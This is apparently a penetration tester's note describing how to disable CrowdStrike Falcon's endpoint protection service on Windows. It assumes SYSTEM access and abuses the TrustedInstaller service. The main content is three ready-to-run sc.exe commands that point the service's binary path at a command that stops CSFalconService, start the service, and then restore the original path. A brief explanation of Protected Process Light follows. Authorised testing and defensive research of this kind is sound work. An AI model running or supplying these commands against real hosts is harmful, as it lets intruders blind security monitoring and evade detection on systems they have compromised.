EDR Bypass via Trusted Installer Abuse

Assumptions

• Tester has achieved a method of command execution in SYSTEM context.
• The TrustedInstaller service is not currently running.

Procedure

Given an insecure implementation and SYSTEM, it’s possible to kill common EDR services like CrowdStrike via the TrustedInstaller service

1. Reconfigure the TrustedInstaller service to stop the target service.

sc.exe config TrustedInstaller binPath= "cmd /c sc stop CSFalconService" 

2. Start TrustedInstaller

sc.exe start "TrustedInstaller" 

3. Reconfigure TrustedInstaller to point at the original binary.

sc.exe config TrustedInstaller binPath= "C:\Windows\servicing\TrustedInstaller.exe"

Explanation

• Windows implements something called Protected Process Light (PPL)
• pretty much just access controls at the process level; only particular contexts can manage processes or access process memory
  • TrustedInstaller, which is a virtual context — not an actual user — is, well, trusted
  • There’s also a TrustedInstaller Windows service (it’s proxy time)
• PPL status can be determined on a process via ProcExplorer, etc
• CSFalconService.exe (iirc) runs with PPL implemented
• Reconfigure TrustedInstaller service to kill CSFalconService, and BOOM, it (temporarily) dead

References

• Malware.news - Too Accessible: How CrowdStrike Falcon Detects and Prevents Windows Logon Bypasses